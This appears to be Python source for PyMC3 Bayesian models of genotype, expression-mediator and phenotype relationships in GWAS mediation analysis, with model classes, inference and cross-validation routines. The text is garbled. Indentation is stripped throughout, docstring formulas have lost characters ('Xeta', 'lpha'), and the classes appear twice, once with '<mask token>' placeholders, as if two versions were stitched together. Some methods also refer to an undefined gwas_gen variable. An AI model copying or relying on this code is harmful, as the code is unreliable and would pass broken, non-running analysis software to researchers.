gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
| <mask token>
class BayesianModel(object):
<mask token>
def __init__(self, variational=True, mb=False, n_chain=50000, n_trace=
5000, logistic=False, steps=None):
"""
Args:
variational (bool, optional): Use Variational Inference
mb (bool, optional): Use minibatches
"""
self.variational = variational
self.cached_model = None
self.mb = mb
self.n_chain = n_chain
self.n_trace = n_trace
self.logistic = logistic
self.steps = steps
def cache_model(self, **inputs):
"""
Create a cached model for the Bayesian model using
shared theano variables for each Bayesian
input parameter.
Args:
**inputs (dict): inputs for Bayesian model
"""
self.shared_vars = self._create_shared_vars(**inputs)
self.cached_model = self.create_model(**self.shared_vars)
def create_model(self, **inputs):
"""
Each instance of this class needs to define
their PYMC3 model in here.
"""
raise NotImplementedError('This method has to be overwritten.')
<mask token>
def _clean_inputs(self, inputs):
"""
Clean the inputs, i.e. remove some
genotype columns. Useful for some class of Bayesian models
such as Two-Stage, where first stage involves filtering
on certain SNPs.
Args:
inputs (dict): inputs for Bayesian model
Returns:
dict: cleaned inputs for Bayesian model
"""
return inputs
def run(self, **inputs):
"""
Run cached Bayesian model using the inputs
Args:
**inputs (dict): inputs for Bayesian model
Returns:
trace: Trace of the PyMC3 inference
"""
if self.cached_model is None:
self.cache_model(**inputs)
for name, data in inputs.items():
self.shared_vars[name].set_value(data)
if self.mb and self.variational:
self.minibatches = zip(self._mb_generator(inputs['gwas_gen']),
self._mb_generator(inputs['gwas_phen']))
self.trace = self._inference()
return self.trace
def _inference(self, n_trace=None):
"""
Perform the inference. Uses ADVI if self.variational
is True. Also, uses minibatches is self.mb=True based
on generators defined in self.run.
Otherwise, uses Metropolis.
Args:
n_trace (int, optional): Number of steps used for trace
Returns:
trace: Trace of the PyMC3 inference
"""
if n_trace is None:
n_trace = self.n_trace
with self.cached_model:
if self.variational:
if self.mb:
v_params = pm.variational.advi_minibatch(n=self.n_chain,
minibatch_tensors=self.minibatch_tensors,
minibatch_RVs=self.minibatch_RVs, minibatches=self.
minibatches)
else:
v_params = pm.variational.advi(n=self.n_chain)
trace = pm.variational.sample_vp(v_params, draws=n_trace)
self.v_params = v_params
else:
if self.steps is None:
self.steps = pm.Metropolis()
start = pm.find_MAP(fmin=optimize.fmin_powell)
trace = pm.sample(self.n_chain, step=self.steps, start=
start, progressbar=True)
trace = trace[-n_trace:]
self.trace = trace
return trace
def cross_validation(self, k_folds, **inputs):
"""
Run cross-validation on the inputs and calculate
statistics for each fold test set.
Args:
k_folds (sklearn.cross_validation): Folds of test and train
samples
**inputs (dict): inputs for Bayesian model
Returns:
dict: statistics for each fold
"""
self.cv_stats, self.cv_traces = [], []
self.k_folds = k_folds
inputs = self._clean_inputs(inputs)
for i, fold in enumerate(k_folds):
train, test = fold
input_train, input_test = {}, {}
for name, data in inputs.items():
if name in self.cv_vars:
input_train[name] = data[train]
input_test[name] = data[test]
else:
input_train[name] = data
input_test[name] = data
trace = self.run(**input_train)
stats = self.calculate_statistics(trace, **input_test)
self.cv_traces.append(trace)
self.cv_stats.append(stats)
return self.cv_traces, self.cv_stats
def calculate_ppc(self, trace):
"""
Calculate several post-predictive checks
based on the trace.
"""
dic = pm.stats.dic(trace, self.cached_model)
waic, log_py, logp = calculate_waic(trace, self.cached_model)
mu, sd, zscore = self._alpha_stats(trace)
return {'dic': dic, 'waic': waic, 'logp': logp, 'mu': mu, 'sd': sd,
'zscore': zscore}
def calculate_statistics(self, trace, **input_test):
"""
Calculate mse and logp statistics on a test set.
Args:
**input_test (dict): test set of inputs
trace (PyMC3.trace): Trace of the inference chain
Returns:
dict: logp and mse
"""
inputs = self._clean_inputs(input_test)
mc_logp = self._logp(trace, **inputs)
mean_mse = self._mse(trace, **inputs)
mse2 = self._mse2(trace, **inputs)
mu, sd, zscore = self._alpha_stats(trace)
return {'logp': mc_logp, 'mse': mean_mse, 'mse2': mse2, 'mu': mu,
'sd': sd, 'zscore': zscore}
def calculate_bf(self, trace, var_name='mediator_model'):
"""
Calculate Bayes Factor using a Bernoulli variable in the
trace.
"""
p_alt = trace[var_name].mean()
bayes_factor = p_alt / (1 - p_alt)
return bayes_factor
def _logp(self, trace, **inputs):
"""
Calculate log likelihood using Monte Carlo integration.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Log likelihood as estimated by Monte Carlo integration
"""
def calc_log(step):
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_prob = norm.logpdf(x=inputs['gwas_phen'], loc=phen_pred,
scale=step['phenotype_sigma'])
return phen_prob
phen_probs = [calc_log(trace[idx]) for idx in np.random.randint(0,
len(self.trace), 500)]
phen_probs = np.asmatrix(phen_probs)
mc_logp = phen_probs.sum(axis=1).mean()
return mc_logp
def _mse(self, trace, **inputs):
"""
Calculate mean squared error of the model fit.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
phen_mse = []
for idx in np.random.randint(0, len(trace), 500):
step = self.trace[idx]
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
mean_mse = np.mean(phen_mse)
return mean_mse
def _mse2(self, trace, **inputs):
"""
Calculate mean squared error of the model fit
using posterior means of beta_med instead of
sampling from it.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
exp = np.dot(inputs['gwas_gen'], trace['beta_med'].mean(axis=0).T)
phen_pred = exp * trace['alpha'].mean()
mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
return mse
<mask token>
def _mb_generator(self, data, size=500):
"""
Generator for minibatches
"""
rng = np.random.RandomState(0)
while True:
ixs = rng.randint(len(data), size=size)
yield data[ixs]
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=
self.vars['p_sigma_beta'])
phen = pm.Normal('phen', mu=phenotype_mu, sd=
phenotype_sigma, observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
